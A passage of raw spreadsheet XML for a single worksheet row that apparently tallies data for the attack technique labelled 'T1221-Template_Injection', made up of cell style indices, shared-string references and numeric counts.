        <v>104</v>
      </c>
      <c r="G58" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H58" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I58" s="81" t="s">
        <v>1264</v>
      </c>
      <c r="J58" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K58" s="81" t="s">
        <v>1265</v>
      </c>
      <c r="L58" s="81" t="s">
        <v>1266</v>
      </c>
      <c r="M58" s="378" t="s">
        <v>228</v>
      </c>
      <c r="N58" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O58" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P58" s="91"/>
      <c r="Q58" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R58" s="92" t="s">
        <v>1267</v>
      </c>
      <c r="S58" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T58" s="92" t="s">
        <v>1268</v>
      </c>
      <c r="U58" s="94" t="s">
        <v>1269</v>
      </c>
      <c r="V58" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W58" s="96" t="s">
        <v>1270</v>
      </c>
      <c r="X58" s="196" t="s">
        <v>1271</v>
      </c>
      <c r="Y58" s="83" t="s">
        <v>1272</v>
      </c>
      <c r="Z58" s="188" t="s">
        <v>1273</v>
      </c>
      <c r="AA58" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB58" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC58" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD58" s="83"/>
      <c r="AE58" s="83"/>
      <c r="AF58" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG58" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH58" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI58" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ58" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK58" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL58" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM58" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN58" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO58" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP58" s="385" t="str">
        <f>M58&amp;"-frag"</f>
        <v>T1221-Template_Injection-frag</v>
      </c>
      <c r="AQ58" s="646">
        <v>16</v>
      </c>
      <c r="AR58" s="100"/>
      <c r="AS58" s="100">
        <v>1</v>
      </c>
      <c r="AT58" s="100">
        <v>1</v>
      </c>
      <c r="AU58" s="100">
        <v>2</v>
      </c>
      <c r="AV58" s="92" t="s">
        <v>910</v>
      </c>
      <c r="AW58" s="100">
        <v>1</v>
      </c>
      <c r="AX58" s="100">
        <v>1</v>
      </c>
      <c r="AY58" s="100">
        <v>1</v>
      </c>
      <c r="AZ58" s="100">
        <v>2</v>
      </c>
      <c r="BA58" s="381" t="s">
        <v>4887</v>
      </c>
      <c r="BB58" s="101">
        <v>1</v>
      </c>
      <c r="BC58" s="102" t="s">
        <v>1796</v>
      </c>
      <c r="BD58" s="102">
        <v>1</v>
      </c>
      <c r="BE58" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF58" s="103">
        <v>1</v>
      </c>
      <c r="BG58" s="104">
        <v>1</v>
      </c>
      <c r="BH58" s="105">
        <v>5</v>
      </c>
      <c r="BI58" s="106" t="s">
        <v>1861</v>
      </c>
      <c r="BJ58" s="497">
        <v>5</v>
      </c>
      <c r="BK58" s="107" t="s">
        <v>1862</v>
      </c>
      <c r="BL58" s="107">
        <v>5</v>
      </c>
      <c r="BM58" s="108">
        <v>4</v>
      </c>
      <c r="BN58" s="109">
        <v>6</v>
      </c>
      <c r="BO58" s="110" t="s">
        <v>1887</v>
      </c>
      <c r="BP58" s="501">
        <v>6</v>
      </c>
      <c r="BQ58" s="111" t="s">
        <v>1888</v>
      </c>
      <c r="BR58" s="111">
        <v>6</v>
      </c>
      <c r="BS58" s="112">
        <v>4</v>
      </c>
      <c r="BT58" s="113">
        <v>16</v>
      </c>
      <c r="BU58" s="114" t="s">
        <v>3359</v>
      </c>
      <c r="BV58" s="503">
        <v>11</v>
      </c>
      <c r="BW58" s="115" t="s">
        <v>3360</v>
      </c>
      <c r="BX58" s="115">
        <v>6</v>
      </c>
      <c r="BY58" s="116">
        <v>9</v>
      </c>
      <c r="BZ58" s="250">
        <v>21</v>
      </c>
      <c r="CA58" s="251" t="s">
        <v>3361</v>
      </c>
      <c r="CB58" s="505">
        <v>15</v>
      </c>
      <c r="CC58" s="252" t="s">
        <v>3362</v>
      </c>
      <c r="CD58" s="252">
        <v>13</v>
      </c>
      <c r="CE58" s="253">
        <v>7</v>
      </c>
      <c r="CF58" s="101">
        <v>37</v>
      </c>
      <c r="CG58" s="102" t="s">
        <v>3363</v>
      </c>
      <c r="CH58" s="102">
        <v>26</v>
      </c>
      <c r="CI58" s="103" t="s">
        <v>3364</v>
      </c>
      <c r="CJ58" s="103">
        <v>19</v>
      </c>
      <c r="CK58" s="104">
        <v>10</v>
      </c>
      <c r="CL58" s="105">
        <v>0</v>
      </c>
      <c r="CM58" s="106">
        <v>0</v>
      </c>
      <c r="CN58" s="497">
        <v>0</v>
      </c>
      <c r="CO58" s="107">
        <v>0</v>
      </c>
      <c r="CP58" s="107">
        <v>0</v>
      </c>
      <c r="CQ58" s="108">
        <v>0</v>
      </c>
      <c r="CR58" s="109">
        <v>8</v>
      </c>
      <c r="CS58" s="110" t="s">
        <v>3365</v>
      </c>
      <c r="CT58" s="501">
        <v>3</v>
      </c>
      <c r="CU58" s="111" t="s">
        <v>3366</v>
      </c>
      <c r="CV58" s="111">
        <v>3</v>
      </c>
      <c r="CW58" s="112">
        <v>3</v>
      </c>
      <c r="CX58" s="113">
        <v>14</v>
      </c>
      <c r="CY58" s="114" t="s">
        <v>2165</v>
      </c>
      <c r="CZ58" s="503">
        <v>9</v>
      </c>
      <c r="DA58" s="115" t="s">
        <v>2166</v>
      </c>
      <c r="DB58" s="115">
        <v>9</v>
      </c>
      <c r="DC58" s="116">
        <v>7</v>
      </c>
      <c r="DD58" s="101">
        <v>0</v>
      </c>
      <c r="DE58" s="102">
        <v>0</v>
      </c>
      <c r="DF58" s="102">
        <v>0</v>
      </c>
      <c r="DG58" s="103">
        <v>0</v>
      </c>
      <c r="DH58" s="103">
        <v>0</v>
      </c>
      <c r="DI58" s="104">
        <v>0</v>
      </c>
      <c r="DJ58" s="105">
        <v>1</v>
      </c>
      <c r="DK58" s="106" t="s">
        <v>3367</v>
      </c>
      <c r="DL58" s="497">
        <v>1</v>
      </c>
      <c r="DM58" s="107" t="s">
        <v>2646</v>
      </c>
      <c r="DN58" s="107">
        <v>1</v>
      </c>
      <c r="DO58" s="108">
        <v>1</v>
      </c>
      <c r="DP58" s="109">
        <v>1</v>
      </c>
      <c r="DQ58" s="110" t="s">
        <v>3367</v>
      </c>
      <c r="DR58" s="501">
        <v>1</v>
      </c>
      <c r="DS58" s="111" t="s">
        <v>2646</v>
      </c>
      <c r="DT58" s="111">
        <v>1</v>
      </c>
      <c r="DU58" s="112">
        <v>1</v>
      </c>
      <c r="DV58" s="113">
        <v>7</v>
      </c>
      <c r="DW58" s="114" t="s">
        <v>3368</v>
      </c>
      <c r="DX58" s="503">
        <v>7</v>
      </c>
      <c r="DY58" s="115" t="s">
        <v>3369</v>
      </c>
      <c r="DZ58" s="115">
        <v>2</v>
      </c>
      <c r="EA58" s="116">
        <v>7</v>
      </c>
      <c r="EB58" s="250">
        <v>3</v>
      </c>
      <c r="EC58" s="251" t="s">
        <v>3370</v>
      </c>
      <c r="ED58" s="505">
        <v>3</v>
      </c>
      <c r="EE58" s="252" t="s">
        <v>3371</v>
      </c>
      <c r="EF58" s="252">
        <v>3</v>
      </c>
      <c r="EG58" s="253">
        <v>2</v>
      </c>
      <c r="EH58" s="101">
        <v>10</v>
      </c>
      <c r="EI58" s="102" t="s">
        <v>3372</v>
      </c>
      <c r="EJ58" s="102">
        <v>10</v>
      </c>
      <c r="EK58" s="103" t="s">
        <v>3373</v>
      </c>
      <c r="EL58" s="103">
        <v>5</v>
      </c>
      <c r="EM58" s="104">
        <v>7</v>
      </c>
      <c r="EN58" s="105">
        <v>0</v>
      </c>
      <c r="EO58" s="106">
        <v>0</v>
      </c>
      <c r="EP58" s="497">
        <v>0</v>
      </c>
      <c r="EQ58" s="107">
        <v>0</v>
      </c>
      <c r="ER58" s="107">
        <v>0</v>
      </c>
      <c r="ES58" s="108">
        <v>0</v>
      </c>
      <c r="ET58" s="109">
        <v>0</v>
      </c>
      <c r="EU58" s="110">
        <v>0</v>
      </c>
      <c r="EV58" s="501">
        <v>0</v>
      </c>
      <c r="EW58" s="111">
        <v>0</v>
      </c>
      <c r="EX58" s="111">
        <v>0</v>
      </c>
      <c r="EY58" s="112">
        <v>0</v>
      </c>
      <c r="EZ58" s="113">
        <v>1</v>
      </c>
      <c r="FA58" s="114" t="s">
        <v>3367</v>
      </c>
      <c r="FB58" s="503">
        <v>1</v>
      </c>
      <c r="FC58" s="115" t="s">
        <v>2646</v>
      </c>
      <c r="FD58" s="115">
        <v>1</v>
      </c>
      <c r="FE58" s="116">
        <v>1</v>
      </c>
      <c r="FF58" s="101">
        <v>1</v>
      </c>
      <c r="FG58" s="102" t="s">
        <v>1796</v>
      </c>
      <c r="FH58" s="102">
        <v>1</v>
      </c>
      <c r="FI58" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ58" s="103">
        <v>1</v>
      </c>
      <c r="FK58" s="104">
        <v>1</v>
      </c>
      <c r="FL58" s="105">
        <v>2</v>
      </c>
      <c r="FM58" s="106" t="s">
        <v>3374</v>
      </c>
      <c r="FN58" s="497">
        <v>2</v>
      </c>
      <c r="FO58" s="107" t="s">
        <v>3375</v>
      </c>
      <c r="FP58" s="107">
        <v>2</v>
      </c>
      <c r="FQ58" s="108">
        <v>2</v>
      </c>
      <c r="FR58" s="109">
        <v>3</v>
      </c>
      <c r="FS58" s="110" t="s">
        <v>3376</v>
      </c>
      <c r="FT58" s="501">
        <v>3</v>
      </c>
      <c r="FU58" s="111" t="s">
        <v>3377</v>
      </c>
      <c r="FV58" s="111">
        <v>3</v>
      </c>
      <c r="FW58" s="112">
        <v>3</v>
      </c>
      <c r="FX58" s="113">
        <v>1</v>
      </c>
      <c r="FY58" s="114" t="s">
        <v>1796</v>
      </c>
      <c r="FZ58" s="503">
        <v>1</v>
      </c>
      <c r="GA58" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB58" s="115">
        <v>1</v>
      </c>
      <c r="GC58" s="116">
        <v>1</v>
      </c>
      <c r="GD58" s="250">
        <v>11</v>
      </c>
      <c r="GE58" s="251" t="s">
        <v>3378</v>
      </c>
      <c r="GF58" s="505">
        <v>7</v>
      </c>
      <c r="GG58" s="252" t="s">
        <v>3379</v>
      </c>
      <c r="GH58" s="252">
        <v>5</v>
      </c>
      <c r="GI58" s="253">
        <v>5</v>
      </c>
      <c r="GJ58" s="101">
        <v>12</v>
      </c>
      <c r="GK58" s="102" t="s">
        <v>3380</v>
      </c>
      <c r="GL58" s="102">
        <v>8</v>
      </c>
      <c r="GM58" s="103" t="s">
        <v>3381</v>
      </c>
      <c r="GN58" s="103">
        <v>6</v>
      </c>
      <c r="GO58" s="104">
        <v>5</v>
      </c>
      <c r="GP58" s="105">
        <v>0</v>
      </c>
      <c r="GQ58" s="106">
        <v>0</v>
      </c>
      <c r="GR58" s="497">
        <v>0</v>
      </c>
      <c r="GS58" s="107">
        <v>0</v>
      </c>
      <c r="GT58" s="107">
        <v>0</v>
      </c>
      <c r="GU58" s="108">
        <v>0</v>
      </c>
      <c r="GV58" s="109">
        <v>0</v>
      </c>
      <c r="GW58" s="110">
        <v>0</v>
      </c>
      <c r="GX58" s="501">
        <v>0</v>
      </c>
      <c r="GY58" s="111">
        <v>0</v>
      </c>
      <c r="GZ58" s="111">
        <v>0</v>
      </c>
      <c r="HA58" s="112">
        <v>0</v>
      </c>
      <c r="HB58" s="113">
        <v>3</v>
      </c>
      <c r="HC58" s="114" t="s">
        <v>3376</v>
      </c>
      <c r="HD58" s="503">
        <v>3</v>
      </c>
      <c r="HE58" s="115" t="s">
        <v>3377</v>
      </c>
      <c r="HF58" s="115">
        <v>3</v>
      </c>
      <c r="HG58" s="116">
        <v>3</v>
      </c>
      <c r="HH58" s="101">
        <v>0</v>
      </c>
      <c r="HI58" s="102">
        <v>0</v>
      </c>
      <c r="HJ58" s="102">
        <v>0</v>
      </c>
      <c r="HK58" s="103">
        <v>0</v>
      </c>
      <c r="HL58" s="103">
        <v>0</v>
      </c>
      <c r="HM58" s="104">
        <v>0</v>
      </c>
      <c r="HN58" s="105">
        <v>2</v>
      </c>
      <c r="HO58" s="106" t="s">
        <v>3382</v>
      </c>
      <c r="HP58" s="497">
        <v>2</v>
      </c>
      <c r="HQ58" s="107" t="s">
        <v>3383</v>
      </c>
      <c r="HR58" s="107">
        <v>2</v>
      </c>
      <c r="HS58" s="108">
        <v>2</v>
      </c>
      <c r="HT58" s="109">
        <v>2</v>
      </c>
      <c r="HU58" s="110" t="s">
        <v>3382</v>
      </c>
      <c r="HV58" s="501">
        <v>2</v>
      </c>
      <c r="HW58" s="111" t="s">
        <v>3383</v>
      </c>
      <c r="HX58" s="111">
        <v>2</v>
      </c>
      <c r="HY58" s="112">
        <v>2</v>
      </c>
      <c r="HZ58" s="113">
        <v>8</v>
      </c>
      <c r="IA58" s="114" t="s">
        <v>3365</v>
      </c>
      <c r="IB58" s="503">
        <v>3</v>
      </c>
      <c r="IC58" s="115" t="s">
        <v>3366</v>
      </c>
      <c r="ID58" s="115">
        <v>3</v>
      </c>
      <c r="IE58" s="116">
        <v>3</v>
      </c>
      <c r="IF58" s="250">
        <v>7</v>
      </c>
      <c r="IG58" s="251" t="s">
        <v>3384</v>
      </c>
      <c r="IH58" s="505">
        <v>5</v>
      </c>
      <c r="II58" s="252" t="s">
        <v>3385</v>
      </c>
      <c r="IJ58" s="252">
        <v>5</v>
      </c>
      <c r="IK58" s="253">
        <v>4</v>
      </c>
      <c r="IL58" s="101">
        <v>15</v>
      </c>
      <c r="IM58" s="102" t="s">
        <v>3386</v>
      </c>
      <c r="IN58" s="102">
        <v>8</v>
      </c>
      <c r="IO58" s="103" t="s">
        <v>3387</v>
      </c>
      <c r="IP58" s="103">
        <v>8</v>
      </c>
      <c r="IQ58" s="104">
        <v>6</v>
      </c>
      <c r="IR58" s="105">
        <v>0</v>
      </c>
      <c r="IS58" s="106">
        <v>0</v>
      </c>
      <c r="IT58" s="497">
        <v>0</v>
      </c>
      <c r="IU58" s="107">
        <v>0</v>
      </c>
      <c r="IV58" s="107">
        <v>0</v>
      </c>
      <c r="IW58" s="108">
        <v>0</v>
      </c>
      <c r="IX58" s="109">
        <v>8</v>
      </c>
      <c r="IY58" s="110" t="s">
        <v>3365</v>
      </c>
      <c r="IZ58" s="501">
        <v>3</v>
      </c>
      <c r="JA58" s="111" t="s">
        <v>3366</v>
      </c>
      <c r="JB58" s="111">
        <v>3</v>
      </c>
      <c r="JC58" s="112">
        <v>3</v>
      </c>
      <c r="JD58" s="113">
        <v>10</v>
      </c>
      <c r="JE58" s="114" t="s">
        <v>3388</v>
      </c>
      <c r="JF58" s="503">
        <v>5</v>
      </c>
      <c r="JG58" s="115" t="s">
        <v>3389</v>
      </c>
      <c r="JH58" s="115">
        <v>5</v>
      </c>
      <c r="JI58" s="116">
        <v>5</v>
      </c>
      <c r="JJ58" s="101">
        <v>0</v>
      </c>
      <c r="JK58" s="102">
        <v>0</v>
      </c>
      <c r="JL58" s="102">
        <v>0</v>
      </c>
      <c r="JM58" s="103">
        <v>0</v>
      </c>
      <c r="JN58" s="103">
        <v>0</v>
      </c>
      <c r="JO58" s="104">
        <v>0</v>
      </c>
      <c r="JP58" s="105">
        <v>0</v>
      </c>
      <c r="JQ58" s="106">
        <v>0</v>
      </c>
      <c r="JR58" s="497">
        <v>0</v>
      </c>
      <c r="JS58" s="107">
        <v>0</v>
      </c>
      <c r="JT58" s="107">
        <v>0</v>
      </c>
      <c r="JU58" s="108">
        <v>0</v>
      </c>
      <c r="JV58" s="109">
        <v>0</v>
      </c>
      <c r="JW58" s="110">
        <v>0</v>
      </c>
      <c r="JX58" s="501">
        <v>0</v>
      </c>
      <c r="JY58" s="111">
        <v>0</v>
      </c>
      <c r="JZ58" s="111">
        <v>0</v>
      </c>
      <c r="KA58" s="112">
        <v>0</v>
      </c>
      <c r="KB58" s="113">
        <v>0</v>
      </c>
      <c r="KC58" s="114">
        <v>0</v>
      </c>
      <c r="KD58" s="503">
        <v>0</v>
      </c>
      <c r="KE58" s="115">
        <v>0</v>
      </c>
      <c r="KF58" s="115">
        <v>0</v>
      </c>
      <c r="KG58" s="116">
        <v>0</v>
      </c>
      <c r="KH58" s="250">
        <v>0</v>
      </c>
      <c r="KI58" s="251">
        <v>0</v>
      </c>
      <c r="KJ58" s="505">
        <v>0</v>
      </c>
      <c r="KK58" s="252">
        <v>0</v>
      </c>
      <c r="KL58" s="252">
        <v>0</v>
      </c>
      <c r="KM58" s="253">
        <v>0</v>
      </c>
      <c r="KN58" s="101">
        <v>0</v>
      </c>
      <c r="KO58" s="102">
        <v>0</v>
      </c>
      <c r="KP58" s="102">
        <v>0</v>
      </c>
      <c r="KQ58" s="103">
        <v>0</v>
      </c>
      <c r="KR58" s="103">
        <v>0</v>
      </c>
      <c r="KS58" s="104">
        <v>0</v>
      </c>
      <c r="KT58" s="105">
        <v>0</v>
      </c>
      <c r="KU58" s="106">
        <v>0</v>
      </c>
      <c r="KV58" s="497">
        <v>0</v>
      </c>
      <c r="KW58" s="107">
        <v>0</v>
      </c>
      <c r="KX58" s="107">
        <v>0</v>
      </c>
      <c r="KY58" s="108">
        <v>0</v>
      </c>
      <c r="KZ58" s="109">
        <v>0</v>
      </c>
      <c r="LA58" s="110">
        <v>0</v>
      </c>
      <c r="LB58" s="501">
        <v>0</v>
      </c>
      <c r="LC58" s="111">
        <v>0</v>
      </c>
      <c r="LD58" s="111">
        <v>0</v>
      </c>
      <c r="LE58" s="112">
        <v>0</v>
      </c>
      <c r="LF58" s="113">
        <v>0</v>
      </c>
      <c r="LG58" s="114">
        <v>0</v>
      </c>
      <c r="LH58" s="503">
        <v>0</v>
      </c>
      <c r="LI58" s="115">
        <v>0</v>
      </c>
      <c r="LJ58" s="115">
        <v>0</v>
      </c>
      <c r="LK58" s="116">
        <v>0</v>
      </c>
      <c r="LL58" s="117">
        <v>20</v>
      </c>
      <c r="LM58" s="507">
        <v>17</v>
      </c>
      <c r="LN58" s="119">
        <v>2</v>
      </c>
      <c r="LO58" s="119">
        <v>6</v>
      </c>
      <c r="LP58" s="119">
        <v>11</v>
      </c>
      <c r="LQ58" s="119">
        <v>7</v>
      </c>
      <c r="LR58" s="119">
        <v>10</v>
      </c>
      <c r="LS58" s="119">
        <v>11</v>
      </c>
      <c r="LT58" s="382"/>
      <c r="LU58" s="117">
        <v>6</v>
      </c>
      <c r="LV58" s="118" t="s">
        <v>4236</v>
      </c>
      <c r="LW58" s="507">
        <v>6</v>
      </c>
      <c r="LX58" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY58" s="119">
        <v>1</v>
      </c>
      <c r="LZ58" s="119">
        <v>6</v>
      </c>
      <c r="MA58" s="117">
        <v>0</v>
      </c>
      <c r="MB58" s="118">
        <v>0</v>
      </c>
      <c r="MC58" s="507">
        <v>0</v>
      </c>
      <c r="MD58" s="119">
        <v>0</v>
      </c>
      <c r="ME58" s="119">
        <v>0</v>
      </c>
      <c r="MF58" s="119">
        <v>0</v>
      </c>
      <c r="MG58" s="117">
        <v>0</v>
      </c>
      <c r="MH58" s="118">
        <v>0</v>
      </c>
      <c r="MI58" s="507">
        <v>0</v>
      </c>
      <c r="MJ58" s="119">
        <v>0</v>
      </c>
      <c r="MK58" s="119">
        <v>0</v>
      </c>
      <c r="ML58" s="119">
        <v>0</v>
      </c>
      <c r="MM58" s="117">
        <v>0</v>
      </c>
      <c r="MN58" s="118">
        <v>0</v>
      </c>
      <c r="MO58" s="507">
        <v>0</v>
      </c>
      <c r="MP58" s="119">
        <v>0</v>
      </c>
      <c r="MQ58" s="119">
        <v>0</v>
      </c>
      <c r="MR58" s="119">
        <v>0</v>
      </c>
      <c r="MS58" s="117">
        <v>2</v>
      </c>
      <c r="MT58" s="118" t="s">
        <v>4237</v>
      </c>
      <c r="MU58" s="507">
        <v>1</v>
      </c>
      <c r="MV58" s="119" t="s">
        <v>2658</v>
      </c>
      <c r="MW58" s="119">
        <v>1</v>
      </c>
      <c r="MX58" s="119">
        <v>1</v>
      </c>
      <c r="MY58" s="117">
        <v>0</v>
      </c>
      <c r="MZ58" s="118">
        <v>0</v>
      </c>
      <c r="NA58" s="507">
        <v>0</v>
      </c>
      <c r="NB58" s="119">
        <v>0</v>
      </c>
      <c r="NC58" s="119">
        <v>0</v>
      </c>
      <c r="ND58" s="119">
        <v>0</v>
      </c>
      <c r="NE58" s="117">
        <v>0</v>
      </c>
      <c r="NF58" s="118">
        <v>0</v>
      </c>
      <c r="NG58" s="507">
        <v>0</v>
      </c>
      <c r="NH58" s="119">
        <v>0</v>
      </c>
      <c r="NI58" s="119">
        <v>0</v>
      </c>
      <c r="NJ58" s="119">
        <v>0</v>
      </c>
      <c r="NK58" s="117">
        <v>5</v>
      </c>
      <c r="NL58" s="118" t="s">
        <v>4189</v>
      </c>
      <c r="NM58" s="507">
        <v>5</v>
      </c>
      <c r="NN58" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO58" s="119">
        <v>1</v>
      </c>
      <c r="NP58" s="119">
        <v>5</v>
      </c>
      <c r="NQ58" s="117">
        <v>0</v>
      </c>
      <c r="NR58" s="118">
        <v>0</v>
      </c>
      <c r="NS58" s="507">
        <v>0</v>
      </c>
      <c r="NT58" s="119">
        <v>0</v>
      </c>
      <c r="NU58" s="119">
        <v>0</v>
      </c>
      <c r="NV58" s="119">
        <v>0</v>
      </c>
      <c r="NW58" s="117">
        <v>7</v>
      </c>
      <c r="NX58" s="118" t="s">
        <v>4376</v>
      </c>
      <c r="NY58" s="507">
        <v>5</v>
      </c>
      <c r="NZ58" s="119" t="s">
        <v>4377</v>
      </c>
      <c r="OA58" s="119">
        <v>5</v>
      </c>
      <c r="OB58" s="119">
        <v>5</v>
      </c>
      <c r="OC58" s="120">
        <v>6</v>
      </c>
      <c r="OD58" s="120">
        <v>6</v>
      </c>
      <c r="OE58" s="120">
        <v>1</v>
      </c>
      <c r="OF58" s="121">
        <v>1</v>
      </c>
      <c r="OG58" s="120">
        <v>6</v>
      </c>
      <c r="OH58" s="120">
        <v>6</v>
      </c>
      <c r="OI58" s="120">
        <v>6</v>
      </c>
      <c r="OJ58" s="120">
        <v>6</v>
      </c>
      <c r="OK58" s="383"/>
      <c r="OL58" s="120">
        <v>6</v>
      </c>
      <c r="OM58" s="120">
        <v>6</v>
      </c>
      <c r="ON58" s="120">
        <v>6</v>
      </c>
      <c r="OO58" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP58" s="120">
        <v>1</v>
      </c>
      <c r="OQ58" s="464">
        <v>6</v>
      </c>
      <c r="OR58" s="120">
        <v>0</v>
      </c>
      <c r="OS58" s="120">
        <v>0</v>
      </c>
      <c r="OT58" s="120">
        <v>0</v>
      </c>
      <c r="OU58" s="120"/>
      <c r="OV58" s="120">
        <v>0</v>
      </c>
      <c r="OW58" s="464">
        <v>0</v>
      </c>
      <c r="OX58" s="120">
        <v>0</v>
      </c>
      <c r="OY58" s="120">
        <v>0</v>
      </c>
      <c r="OZ58" s="120">
        <v>0</v>
      </c>
      <c r="PA58" s="120"/>
      <c r="PB58" s="120">
        <v>0</v>
      </c>
      <c r="PC58" s="464">
        <v>0</v>
      </c>
      <c r="PD58" s="120">
        <v>0</v>
      </c>
      <c r="PE58" s="120">
        <v>0</v>
      </c>
      <c r="PF58" s="120">
        <v>0</v>
      </c>
      <c r="PG58" s="120"/>
      <c r="PH58" s="120">
        <v>0</v>
      </c>
      <c r="PI58" s="464">
        <v>0</v>
      </c>
      <c r="PJ58" s="120">
        <v>0</v>
      </c>
      <c r="PK58" s="120">
        <v>0</v>
      </c>
      <c r="PL58" s="120">
        <v>0</v>
      </c>
      <c r="PM58" s="120"/>
      <c r="PN58" s="120">
        <v>0</v>
      </c>
      <c r="PO58" s="464">
        <v>0</v>
      </c>
      <c r="PP58" s="120">
        <v>0</v>
      </c>
      <c r="PQ58" s="120">
        <v>0</v>
      </c>
      <c r="PR58" s="120">
        <v>0</v>
      </c>
      <c r="PS58" s="120"/>
      <c r="PT58" s="120">
        <v>0</v>
      </c>
      <c r="PU58" s="464">
        <v>0</v>
      </c>
      <c r="PV58" s="120">
        <v>0</v>
      </c>
      <c r="PW58" s="120">
        <v>0</v>
      </c>
      <c r="PX58" s="120">
        <v>0</v>
      </c>
      <c r="PY58" s="120"/>
      <c r="PZ58" s="120">
        <v>0</v>
      </c>
      <c r="QA58" s="464">
        <v>0</v>
      </c>
      <c r="QB58" s="120">
        <v>0</v>
      </c>
      <c r="QC58" s="120">
        <v>0</v>
      </c>
      <c r="QD58" s="120">
        <v>0</v>
      </c>
      <c r="QE58" s="120"/>
      <c r="QF58" s="120">
        <v>0</v>
      </c>
      <c r="QG58" s="464">
        <v>0</v>
      </c>
      <c r="QH58" s="120">
        <v>6</v>
      </c>
      <c r="QI58" s="120">
        <v>6</v>
      </c>
      <c r="QJ58" s="120">
        <v>6</v>
      </c>
      <c r="QK58" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL58" s="120">
        <v>1</v>
      </c>
      <c r="QM58" s="464">
        <v>6</v>
      </c>
      <c r="QN58" s="120">
        <v>0</v>
      </c>
      <c r="QO58" s="120">
        <v>0</v>
      </c>
      <c r="QP58" s="120">
        <v>0</v>
      </c>
      <c r="QQ58" s="120"/>
      <c r="QR58" s="120">
        <v>0</v>
      </c>
      <c r="QS58" s="464">
        <v>0</v>
      </c>
      <c r="QT58" s="184"/>
      <c r="QU58" s="184"/>
      <c r="QV58" s="184"/>
      <c r="QW58" s="184"/>
      <c r="QX58" s="184"/>
      <c r="QY58" s="184"/>
      <c r="QZ58" s="184"/>
      <c r="RA58" s="184"/>
      <c r="RB58" s="184"/>
      <c r="RC58" s="184"/>
      <c r="RD58" s="184"/>
      <c r="RE58" s="184"/>
      <c r="RF58" s="184"/>
      <c r="RG58" s="184"/>
      <c r="RH58" s="184"/>
      <c r="RI58" s="184"/>
      <c r="RJ58" s="184"/>
      <c r="RK58" s="184"/>
      <c r="RL58" s="184"/>
      <c r="RM58" s="184"/>
      <c r="RN58" s="184"/>
      <c r="RO58" s="184"/>
      <c r="RP58" s="184"/>
      <c r="RQ58" s="184"/>
      <c r="RR58" s="184"/>
      <c r="RS58" s="184"/>
      <c r="RT58" s="184"/>
      <c r="RU58" s="184"/>
      <c r="RV58" s="184"/>
      <c r="RW58" s="184"/>
      <c r="RX58" s="184"/>
      <c r="RY58" s="184"/>
      <c r="RZ58" s="184"/>
      <c r="SA58" s="184"/>
      <c r="SB58" s="184"/>
      <c r="SC58" s="184"/>
      <c r="SD58" s="184"/>
      <c r="SE58" s="184"/>
      <c r="SF58" s="184"/>
      <c r="SG58" s="184"/>
      <c r="SH58" s="184"/>
      <c r="SI58" s="184"/>
      <c r="SJ58" s="184"/>
      <c r="SK58" s="184"/>
      <c r="SL58" s="184"/>
      <c r="SM58" s="184"/>
      <c r="SN58" s="184"/>
      <c r="SO58" s="184"/>
      <c r="SP58" s="184"/>
      <c r="SQ58" s="184"/>
      <c r="SR58" s="184"/>
      <c r="SS58" s="184"/>
      <c r="ST58" s="184"/>
      <c r="SU58" s="184"/>
      <c r="SV58" s="184"/>
      <c r="SW58" s="184"/>
      <c r="SX58" s="184"/>
      <c r="SY58" s="184"/>
      <c r="SZ58" s="184"/>
      <c r="TA58" s="184"/>
      <c r="TB58" s="184"/>
      <c r="TC58" s="184"/>
      <c r="TD58" s="184"/>
      <c r="TE58" s="184"/>
      <c r="TF58" s="184"/>
      <c r="TG58" s="184"/>
      <c r="TH58" s="184"/>
      <c r="TI58" s="184"/>
      <c r="TJ58" s="184"/>
      <c r="TK58" s="184"/>
      <c r="TL58" s="184"/>
      <c r="TM58" s="184"/>
      <c r="TN58" s="184"/>
      <c r="TO58" s="184"/>
      <c r="TP58" s="184"/>
      <c r="TQ58" s="184"/>
      <c r="TR58" s="184"/>
      <c r="TS58" s="184"/>
      <c r="TT58" s="184"/>
      <c r="TU58" s="184"/>
      <c r="TV58" s="184"/>
      <c r="TW58" s="184"/>
      <c r="TX58" s="184"/>
      <c r="TY58" s="184"/>
      <c r="TZ58" s="184"/>
      <c r="UA58" s="184"/>
      <c r="UB58" s="184"/>
      <c r="UC58" s="184"/>
      <c r="UD58" s="184"/>
      <c r="UE58" s="184"/>
      <c r="UF58" s="184"/>
      <c r="UG58" s="184"/>
      <c r="UH58" s="184"/>
      <c r="UI58" s="184"/>
      <c r="UJ58" s="184"/>
      <c r="UK58" s="184"/>
      <c r="UL58" s="184"/>
      <c r="UM58" s="184"/>
      <c r="UN58" s="184"/>
      <c r="UO58" s="184"/>
      <c r="UP58" s="184"/>
      <c r="UQ58" s="184"/>
      <c r="UR58" s="184"/>
      <c r="US58" s="184"/>
      <c r="UT58" s="184"/>
      <c r="UU58" s="184"/>
      <c r="UV58" s="184"/>
      <c r="UW58" s="184"/>
      <c r="UX58" s="184"/>
      <c r="UY58" s="184"/>
      <c r="UZ58" s="184"/>
      <c r="VA58" s="184"/>
      <c r="VB58" s="184"/>
      <c r="VC58" s="184"/>
